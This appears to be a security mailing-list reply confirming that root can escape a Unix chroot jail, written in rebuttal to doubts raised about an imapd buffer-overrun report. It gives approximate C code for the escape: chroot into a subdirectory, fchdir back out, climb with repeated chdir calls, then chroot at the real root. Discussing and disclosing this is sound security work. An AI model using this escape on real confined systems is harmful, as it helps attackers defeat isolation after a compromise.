Re: response to the bugtraq report of buffer overruns in imapd LIST command

[imp () VILLAGE ORG (Warner Losh)]

In message <MailManager.956021099.15421.mrc () Ikkoku-Kan Panda COM> Mark Crispin writes:
: Last but not least, I am very interested in Kris Kennaway's claim
: that "It may also be possible to break out of the chroot jail on
: some platforms."  If true, it represents a huge root-level security
: hole on those platforms.  I simply do not believe the claim.  I
: would like to know if there is some substance to this claim, or if
: it was mere speculation.

The claim is 100% real.  I have code that will do it, and the code has
been well known since at least the mid 1990's (when I first
encountered it) and likely dates back much further than that.

With root privs, it is definitely possible to break out of a chroot
jail by chrooting down a level or two, and then using chdir .. to
climb up to root, since that gives the user an access outside of the
jailed code.  It does require breaking root to do that, unless the
current directory is outside of the chroot'd location, in which case
anybody can do this.  The code is approximately:

        fd = open(".", O_RONLY);
        mkdir("foo");
        chroot("foo");          /* cwd now outside the jail */
        fchdir(fd);
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");            /* Most likely at / now */
        chroot(".");

More subtle ways to deal with the finding / problem are left as an
excersize to the reader.

Believe what you will, this is true.  Variations on the above code
work on all systems I've tried it on, except for FreeBSD's jail code.

Warner